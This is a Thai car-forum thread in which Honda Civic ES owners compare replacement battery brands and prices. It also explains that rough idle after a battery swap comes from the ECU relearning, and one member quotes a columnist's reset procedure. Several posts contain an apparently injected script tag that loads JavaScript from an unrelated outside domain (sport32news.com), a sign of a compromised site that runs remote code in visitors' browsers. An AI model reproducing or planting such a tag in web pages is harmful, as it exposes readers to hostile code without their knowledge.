ตอบ
arkom_hc


ชื่อเล่น: เล็ก

เข้าร่วม: 21 ตุลา 2009
ตอบ: 110

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 126
ให้คำขอบคุณ: 50

ที่อยู่: อุทยานวิทยาศาสตร์ประเทศไทย
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 กรกฎา 2010 08:29 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ES อย่างเราๆ ใช้ยี่ห้ออะไรดี กี่แอมป์ ราคาประมาณเท่าไหร่ครับ แบตเริ่มไม่ไหวแล้ว จะได้ไม่โดนหลอก



เปลี่ยนแบตแล้วรอบรถไม่นิ่งบางทีต่ำกว่า500รอบ เวลาเปลี่ยนเกียร์มีอาการกระตุก ไม่ทราบว่าหลังจากถอดแบต ต้องทำการรีเซ็ตกล่อง ECU หรือป่าวครับ แล้ววิธีทำยังงัยครับ


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 14:01, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
ศุกร์, 16 กรกฎา 2010 13:33 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ของเดิมติดรถ 45 แอมป์ ครับ
ราคาเช็คตามเน็ตเลยครับ ขึ้น ๆ ลง ๆ ตลอดครับ บอกไปเดี่ยวไม่ตรง
เวลาเช็คบอกเค้าด้วยว่าเทรินลูกเก่าลดเท่าไร อย่าให้ต่ำกว่า 500 นะครับ
ได้รับคำขอบคุณจาก: arkom_hc  cisco 
mong_civic


ชื่อเล่น: หม่อง

เข้าร่วม: 11 มิถุนา 2009
ตอบ: 709

Guru ES
Guru ES

ได้รับคำขอบคุณ: 672
ให้คำขอบคุณ: 377

ที่อยู่: Chonburi
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 กรกฎา 2010 13:36 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
FB ,Yuasa
ไม่มีเครื่องเสียงพิเศษ ก็แอมป์เท่าเดิมพอ
ได้รับคำขอบคุณจาก: arkom_hc 
@hanaga@


เข้าร่วม: 01 ตุลา 2008
ตอบ: 360

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 493
ให้คำขอบคุณ: 132

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 กรกฎา 2010 13:49 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
Saka พิมพ์ว่า:
ของเดิมติดรถ 45 แอมป์ ครับ
ราคาเช็คตามเน็ตเลยครับ ขึ้น ๆ ลง ๆ ตลอดครับ บอกไปเดี่ยวไม่ตรง
เวลาเช็คบอกเค้าด้วยว่าเทรินลูกเก่าลดเท่าไร อย่าให้ต่ำกว่า 500 นะครับ


เพิ่มเปลี่ยนมาของ pana 45A 1700 บาท ครับผม

เปลี่ยนให้น้องแจ็สที่โคราช ลูกเล็กกว่า ก็ 1700 งงเลยผมครั้นจะขับเขากรุงเทพมาเปลี่ยนก็กระไรอยู่

arkom_hc


ชื่อเล่น: เล็ก

เข้าร่วม: 21 ตุลา 2009
ตอบ: 110

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 126
ให้คำขอบคุณ: 50

ที่อยู่: อุทยานวิทยาศาสตร์ประเทศไทย
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 กรกฎา 2010 13:56 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ขอบคุณครับ เปลี่ยนมาแล้ว GS 1650 บาท ถ้าตีเทิร์นของเก่า 100 เลยกะว่าจะเอาไปขายของเก่า ค่าเบียร์ครับ
PongpanG


ชื่อเล่น: ป๋องแป๋ง

เข้าร่วม: 11 สิงหา 2008
ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

ที่อยู่: รังสิต
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 16 กรกฎา 2010 17:42 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
วิ่ง สัก 20 กิโล มันจะ หายครับ อาการรอบ สวิง

มันเป็นอาการหลัง reset ECU ครับ
ได้รับคำขอบคุณจาก: psYchosis  hacker  cisco 
Kumaro


เข้าร่วม: 08 มกรา 2010
ตอบ: 131

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 181
ให้คำขอบคุณ: 114

ที่อยู่: จันทรเกษม-โชคชัย4-ลาดพร้าว71
ศุกร์, 16 กรกฎา 2010 17:48 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
PongpanG พิมพ์ว่า:
วิ่ง สัก 20 กิโล มันจะ หายครับ อาการรอบ สวิง

มันเป็นอาการหลัง reset ECU ครับ



ตามนั้นคับ
ได้รับคำขอบคุณจาก: hacker 
P.TER.357


เข้าร่วม: 06 มีนา 2010
ตอบ: 968

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 2902

ที่อยู่: เมืองทองธานี - บางใหญ่ นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 16 กรกฎา 2010 19:35 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
Kumaro พิมพ์ว่า:
PongpanG พิมพ์ว่า:
วิ่ง สัก 20 กิโล มันจะ หายครับ อาการรอบ สวิง

มันเป็นอาการหลัง reset ECU ครับ



ตามนั้นคับ



+1 ครับ
"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: hacker 
psYchosis


ชื่อเล่น: โอ๋

เข้าร่วม: 11 สิงหา 2008
ตอบ: 2535

Moderator
Moderator

ได้รับคำขอบคุณ: 9747
ให้คำขอบคุณ: 4367

ที่อยู่: ลาดกระบัง
ปี: 2003
ศุกร์, 16 กรกฎา 2010 23:04 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
PongpanG พิมพ์ว่า:
วิ่ง สัก 20 กิโล มันจะ หายครับ อาการรอบ สวิง

มันเป็นอาการหลัง reset ECU ครับ


confirm ครับ
ได้รับคำขอบคุณจาก: hacker 
PAM


ชื่อเล่น: แป๋ม

เข้าร่วม: 17 กรกฎา 2009
ตอบ: 1514

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2753
ให้คำขอบคุณ: 2884

ที่อยู่: โคราชมหานคร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 17 กรกฎา 2010 01:40 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ตามพี่ๆด้านบนเลยครับ หลังจากที่ถอดขั้วแบตฯออก จะไม่มีไฟไปเลี้ยงที่กล่อง ECU
พอใส่แบตฯลูกใหม่เข้าไป กล่องจะทำการรีเซ็ตใหม่ วิ่งแบบต่อเนื่องประมาณ20-50 Km แล้วแต่การขับ
ก็จะกลับสู่สภาวะปกติครับ .......(ไม่ได้เพิ่เติมอะไรเล๊ย....เรา แค่ขยายความของเพื่อนๆ พี่ๆ เค้าแค่นั้นเอง.)

"<script src="https://sport32news.com/civicesgroup.js">
csirinant


ชื่อเล่น: ยอด

เข้าร่วม: 27 มกรา 2009
ตอบ: 1332

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1574
ให้คำขอบคุณ: 3270

ที่อยู่: อ.ลาดบัวหลวง จ.พระนครศรีอยุธยา
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 17 กรกฎา 2010 02:39 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
เพิ่งเปลี่ยนมาเมื่อวานตอนบ่ายครับ FB GOLD MF (ประมาณเนี่ย)
รูปร่างเท่าเดิม แต่เพิ่มเป็น 55 แอมป์ ที่ร้านมีแบตพ่วงให้เวลาเปลี่ยนด้วย
ทำให้ไม่ต้อง reset ใหม่ ไม่เทิร์นลูกเดิม 2,300.00 บาท (แถมร่ม 1 คัน)
ถ้าแอมป์เท่าเดิม (45 แอมป์) ก็ 1,700.00 บาท (เทิร์นลูกเดิมได้แค่ 150.00 บาท
เลยเก็บไปขายร้านรับซื้อของเก่าดีกว่าครับ) <script src="https://sport32news.com/civicesgroup.js"></
earnee33


ชื่อเล่น: เอิร์น

เข้าร่วม: 08 เมษา 2010
ตอบ: 1349

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1428
ให้คำขอบคุณ: 584

ที่อยู่: โคราช-ปราจีน-บุรีรัมย์
ปี: 2004
เสาร์, 17 กรกฎา 2010 08:12 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
arkom_hc


ชื่อเล่น: เล็ก

เข้าร่วม: 21 ตุลา 2009
ตอบ: 110

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 126
ให้คำขอบคุณ: 50

ที่อยู่: อุทยานวิทยาศาสตร์ประเทศไทย
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 19 กรกฎา 2010 07:58 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ขอบคุณทุกๆคนมากครับ ตอนนี้หายแล้วครับ ..... ครอบครัวนี้อบอุ่นเสมอ (ยังไม่ได้รายงานตัวเป็นทางการ รถยังเดิมๆ อยู่เลย)
AUM[SilveR]


เข้าร่วม: 14 มกรา 2009
ตอบ: 1151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 776
ให้คำขอบคุณ: 159

ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 19 กรกฎา 2010 08:57 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ดีใจด้วย อิอิ ตกใจละสิครับ ผมก็เคยเหมือนกัน "<script src="https://sport32news.com/civicesgroup.js">
arkom_hc


ชื่อเล่น: เล็ก

เข้าร่วม: 21 ตุลา 2009
ตอบ: 110

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 126
ให้คำขอบคุณ: 50

ที่อยู่: อุทยานวิทยาศาสตร์ประเทศไทย
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 19 กรกฎา 2010 09:00 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ตกใจ ครับ แต่ถ้าไม่เจอเราก็จะไม่รู้ แต่ก็ไม่อยากเจอปัญหาหนักครับ อิอิ
notslowclub


ชื่อเล่น: อ้วน

เข้าร่วม: 13 มกรา 2010
ตอบ: 453

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 252
ให้คำขอบคุณ: 0

ที่อยู่: แปดริ้ว
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 19 กรกฎา 2010 09:50 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
PongpanG พิมพ์ว่า:
วิ่ง สัก 20 กิโล มันจะ หายครับ อาการรอบ สวิง

มันเป็นอาการหลัง reset ECU ครับ



ตามนั้นครับ
taneas


ชื่อเล่น: น้องอีฟ

เข้าร่วม: 15 กรกฎา 2010
ตอบ: 1407

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 725
ให้คำขอบคุณ: 625

ที่อยู่: นครศรี-สิงห์บุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 19 กรกฎา 2010 11:28 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ของผมเปลี่ยน ยั่วซา มาสัก20 วันได้แล้ว 45 แอมป์ 1700 บาท แลกเก่าไป 100 บาทเสีย 1600 บาท
ขับปกติคับ
jatesada


เข้าร่วม: 11 ธันวา 2008
ตอบ: 550

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 699
ให้คำขอบคุณ: 946

ที่อยู่: พิจิตร
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 19 กรกฎา 2010 12:18 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
เก็บข้อมูล ครับ กำลังจะเปลี่ยนเหมือนกัน นอกจาก ต้อง reset กล่องแล้ว พวกวิทยุก็ต้องตั้ง code ใหม่เหมือนกันใช่มั๊ยครับ
witaya_76


เข้าร่วม: 12 พฤษภาคม 2009
ตอบ: 44

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 25
ให้คำขอบคุณ: 13

ที่อยู่: ท่าข้าม บางขุนเทียน กรุงเทพฯ
ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
จันทร์, 19 กรกฎา 2010 12:46 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
อันนี้ไปอ่านเจอมาครับ..ลองดู

โดย ธเนศร์ เสนีย์วงศ์ ณ อยุธยา
เรียน อาจารย์ธเนศร์

ขอบพระคุณอาจารย์มากครับที่กรุณาตอบคำถามของผมที่ถามมาในครั้งก่อน มีข้อความที่ถามดังนี้ครับ

"รถซีวิค วีเทค เกียร์ออโต ปี 2003 ผมเปลี่ยนแบตเตอรี่ใหม่ ผมปรับตั้งกระจกไฟฟ้าและซีดีที่ติดมากับรถให้ใช้งาได้ปกติตามคู่มือ

แล้ว หลังจากเปลี่ยนแบตฯใหม่แล้วรถจะเปลี่ยนเกียร์ช้าเหมือนรอรอบ เวลาคิกดาวน์เมื่อก่อนตอบสนองทันที ตอนนี้ต้องกดแช่สักพัก

หนึ่งจึงตอบสนอง ผมเมล์ไปถามที่ฮอนด้า เขาตอบมาว่า "รถซีวิค วีเทค เกียร์ออโต ปี 2003 เมื่อมีการถอดขั้วแบตเตอรี่ในรถยนต์รุ่น

นี้ที่ถูกต้องควรมีการปรับตั้งรอบ เดินเบาใหม่ครับ เพื่อให้กล่องควบคุมเครื่องยนต์เรียนรู้การทำงานพื้นฐานของเครื่องยนต์ครับ รบกวน

ท่านเข้าตรวจสอบทางศูนย์บริการก่อนครับ" ผมก็เลยเอาเข้าศูนย์ที่ต่างจังหวัด (ผมอยู่ภาคอีสานครับ) ช่างที่ศูนย์บอกว่าไม่เกี่ยวกับ

การเปลี่ยนแบตฯ แต่ก็ไม่ได้ทำอะไรให้ ผมก็โทร.ไปถามศูนย์อีกจังหวัดหนึ่ง ก็ได้รับคำตอบเหมือนกัน เลยสงสัยว่ามาตรฐานช่างแต่

ละศูนย์อยู่ตรงไหน เลยต้องพึ่งอาจารย์ครับ ช่วยกรุณาไขข้อข้องใจให้หน่อยครับ ความจริงต้องทำอย่างไร หรือว่าต้องปรับอะไรบ้าง

ครับ ขอบพระคุณมากครับ"


ข้อความที่อาจารย์ตอบ

"ลองง่ายๆ ดูก่อนครับ ถอดขั้วแบตเตอรี่ออกสักนาทีสองนาที ถอดขั้วลบก็พอนะครับ แล้วใส่เข้าไปใหม่

จากนั้นเข้าไปในรถเปิดสวิตช์กุญแจขึ้น ไม่ต้องติดเครื่องนะครับ แค่ ON ก็พอแล้วเหยียบคันเร่งลงไปให้สุด ปล่อยกลับขึ้นมา เหยียบ

เบรกลงไปให้สุด แล้วปล่อยขึ้นมาบิดสวิตช์กุญแจกลับไปที่ OFF

จากนั้นติดเครื่องแล้วขับรถออกไปตามปกติ ไม่ต้องตั้งอกตั้งใจอะไรทั้งนั้น ไม่ต้องคอยจับผิดรถด้วย

ขับไปตามปกติสัก 10-20 กิโลเมตร หากอาการทุกอย่างกลับเข้าเป็นปกติเหมือนก่อนหน้า ก็แค่นั้นแหละครับที่เขาจะเช็กให้คุณ และ

ไม่ได้ทำ ลองดูก่อนนะครับ อาจจะต้องปรับตั้งกันอย่างอื่นอีกก็ได้ แต่ปกติก็เท่านี้เองครับ

ธเนศร์ เสนีวงศ์ ณ อยุธยา"


ผมได้ทำตามแล้วครับ ซึ่งผลปรากฏว่าเกียร์กลับไปเป็นปกติแล้วครับ ตอบสนองดี

ดั้งเดิม มีความสุขกับการขับรถเหมือนเดิมแล้วครับ ผมสงสัยแต่เพียงว่าเรื่องที่ผู้ใช้รถสามารถทำเองได้แบบนี้ทำไมไม่แนะนำไว้ในคู่

มือเลย หรือทำไมช่างไม่ตอบผมแต่แรกที่ผมเมล์ไปถาม ทำไมต้องให้เอาไปศูนย์ เพราะผมเชื่อว่ายังมีผู้ใช้รถอีกเป็นจำนวนมากที

ประสบปัญหาเหมือนผม อาจจะไม่ได้สังเกตหรือสังเกตเจอแล้วช่างในศูนย์ก็ไม่ได้ทำอะไรให้

ขอบพระคุณอาจารย์เป็นอย่างสูงมา ณ ที่นี

สุวัฒน์ เกิดรปาชญ์

เรียนคุณสุวัฒน์

ปกติแล้วผมมักจะไม่นำจดหมายตอบกลับในลักษณะของคุณมาลง เพราะเห็นว่าเป็นในแบบชมเชยการแก้ปัญหารถยนต์

ของผม ไม่เป็นประโยชน์อะไรกับใคร อีกทั้งยังทำให้เกิดความหมั่นไส้ ตาร้อนจากบางท่าน บางคน บางฝ่ายได้ง่าย แต่คราวนี้ผมเห็น

ควรจะนำลงพิมพ์ครับ เพราะอะไร เดี๋ยวผมขอลำดับให้ฟังก็แล้วกัน ประการ แรก ผมได้เคยนำเรื่องราวการปรับตั้งคันเร่งให้สัมพันธ์กับ

การใช้งานรถยนต์ของแต่ ละการขับขี่ดังนี้มาเสนอแล้วหลายครั้งหลายคราว และหลายปีมาแล้วด้วย โดยเสนอผ่านรายการวิทยุรถ

ยนต์ "กลับให้ได้ ไปให้ถึง" ของผม ตั้งแต่เริ่มทำมาใหม่ๆ และเสนอเรื่อยมาตามแต่ท่านผู้ฟังจะถามไป ซึ่งผมก็ทราบดีว่ารายการนี้ได้

รับการรับฟังแพร่หลาย เนื่องจากเพื่อนพ้องน้องพี่ในวงการสื่อมวลชนต่างก็พูดถึงรายการของผมกันมาก เพียงแต่ส่วนหนึ่งจะพูดว่า

แหม ผมดุจัง หรือผมปากร้าย ชอบด่าบริษัทผู้ผลิตรถยนต์เสียเหลือเกิน ทั้งที่ผมจำได้ว่าผมไม่เคยพูดอย่างนั้น แต่ก็ไม่ได้ว่าอะไร

เพราะทราบดีว่าเป็นวิธีหนึ่งสำหรับผู้ที่ไม่สนิทสนมกับผม จะแสดงความใกล้ชิดออกมาให้คนอื่นที่ใกล้ชิดกว่าได้เห็น ได้เข้าใจว่าเขา

ใกล้ชิดกับผมเท่านั้น ทั้งที่คนที่พูดอย่างนั้นส่วนใหญ่ไม่ได้ฟังรายการของผมเลยก็มี แต่ในเวลาเดียวกันเพื่อนช่างของผมก็รับฟังและมี

บ่อยที่โทรศัพท์เข้าไปพูดคุย ประสาช่างกับวิทยากรร่วม และผมเพื่อนช่างเหล่านั้น เป็นช่างระดับนักเรียนช่างกลไปจนถึงช่างระดับนาย

ช่าง วิศวกรประจำโรงงานผู้ผลิตรถยนต์ ทำไมไม่มีใครคิดจะบรรจุเรื่องราวง่ายๆ เหล่านี้ลงไว้ในคู่มือผู้ใช้รถยนต์กันบ้างละครับ ก็เห็นทำ

กันได้กับแค่เรื่องปรับกระจกข้างให้ขึ้น-ลงสะดวก แต่กลับไม่ยอมพูดถึงการปรับเครื่องยนต์กับเกียร์ให้ทำงานตอบสนอง ผู้บริโภคให้ดี

ทั้งที่เป็นเรื่องเล็กนิดเดียว ฮอนด้าถึงกับบอกไปทางผู้บริโภคเช่นคุณสุวัฒน์เลยทีเดียวว่า ต้องนำรถเข้าไปรับการปรับตั้งรอบเดินเบา

ทั้งที่รอบเดินเบาหาได้เกี่ยวข้องอะไรกับคันเร่งเลยแม้แต่น้อย คุณคิดอะไรของคุณกันอยู่ครับนี่ จะดูหมิ่นดูแคลนผู้บริโภคของคุณไป

ถึงไหนหรือครับ ประการต่อไปก็คงอย่างที่คุณสุวัฒน์ว่านั่นแหละครับ คือเมื่อไม่มีใครทำ เราก็ทำเสียเองก็แล้วกัน ไหนๆ เราก็บอกตัว

เองแล้วว่า เราจะรับใช้สังคม ก็บอกเอาไว้ตรงนี้เลยละครับว่า หากท่านไปซื้อรถใช้แล้วที่ไหนมาก็ตาม ลงว่าเป็นรถยนต์ที่ใช้

คอมพิวเตอร์ควบคุมการทำงานของเครื่องยนต์และเกียร์ อัตโนมัติ ก่อนจะขับรถคันนั้นออกจากที่ซื้อหลังลองรถพอใจแล้วก็ขอให้ถอด

ขั้วแบตเตอรี่ ออกสักนาทีสองนาที จากนั้นใส่เข้าไปใหม่แล้วบิดสวิตช์กุญแจไปที่ ON ไม่ต้องสตาร์ตเครื่อง เหยียบคันเร่งลงให้สุด

ปล่อยแล้วเหยียบเบรกลงให้สุด ปล่อยบิดสวิตช์กลับมาที่ OFF ก่อนสัก 10 วินาทีค่อยติดเครื่องขับรถออกไปในระยะทางไม่เกิน

20 กิโลเมตร คอมพิวเตอร์จะเรียนรู้และปรับการเปลี่ยนเกียร์ให้เหมาะกับกขับขี่ของท่าน เอง และจะเริ่มทำงานสอดคล้องกับการขับขี่

ของท่านไปจนราว 50 กิโลเมตร ก็จะจำเอาไว้ได้หมดว่าท่านมีพฤติกรรมการขับขี่อย่างไร และจะตอบสนองความต้องการของท่านได้

อย่างดีที่สุด หากท่านไม่เคยทำมาก่อน ลองทำดูเมื่อมีโอกาสครับ หากเห็นผลก็ดีไป หากไม่เห็นผลก็อาจจะเป็นด้วยว่าผู้ขับคนก่อนขับ

รถในลักษณะเดียวกันกับ ท่านอยู่แล้ว ซึ่งก็ไม่ผิดอะไรไม่ใช่หรือครับกับการเสียเวลาเพียงไม่ถึง 5 นาที

ให้โอกาสรถยนต์เรียนรู้การขับขี่และความต้องการของท่านกันสักหน่อยครับ

ธเนศร์ เสนีวงศ์ ณ อยุธยา


ผมชอบอ่าน การตอบคำถามของท่านมากครับ ลองดุ..ตามนี้..
ได้รับคำขอบคุณจาก: jatesada  Rachen  Tingly_drums 
fasang.Mr


ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ที่อยู่: นนทบุรี-ประจวบฯ-พะเยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 19 กรกฎา 2010 13:12 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ผมเปลี่ยนเป็นแบ็ตแห้งมาครับ ของ alpine มั้ง 45 amp เท่าเดิม 1900 คืนซากครับ
Rachen


ชื่อเล่น: เชน

เข้าร่วม: 03 พฤศจิกา 2012
ตอบ: 1422

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1495
ให้คำขอบคุณ: 2881

ที่อยู่: บ้านฉาง ระยอง และ สตาร์พลาซ่า ระยอง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 30 พฤศจิกา 2012 12:33 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ขอบคุณ ข้อมูลดีๆครับดีมากเลย
ชลธาร คนชาววัง


เข้าร่วม: 05 กันยา 2015
ตอบ: 7

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0

ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
ศุกร์, 19 กุมภา 2016 16:29 - เปลี่ยนแบตเตอรี่ใหม่แล้วรอบต่ำ วิ่งไม่เรียบ
ผมเปลี่ยนแบตมานานแล้ว แต่ไม่ได้เซ็ตอะไรเลย จะมีปัญหาอะไรป่าวครับ ตอนนี้สตาร์ทเครื่องรอบเดินเบาสูงมากเกือบ2000รอบเกือบ5นาทีถึงจะลดลงเหลือไม่ถึง1000รอบ มันเป็นเพราะอะไรครับกลุ้มใจมากเลย ไฟเครื่องก็ไม่โชว์ครับ ปกติเครื่องเย็นยังไงก็ไม่น่าจะรอบสูงขนาดนี้ ตอนเครื่องเย็นรอบจะสูงมาก ขอผู้รู้ช่วยแนะนำหน่อยครับ ขอบคุณครับ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...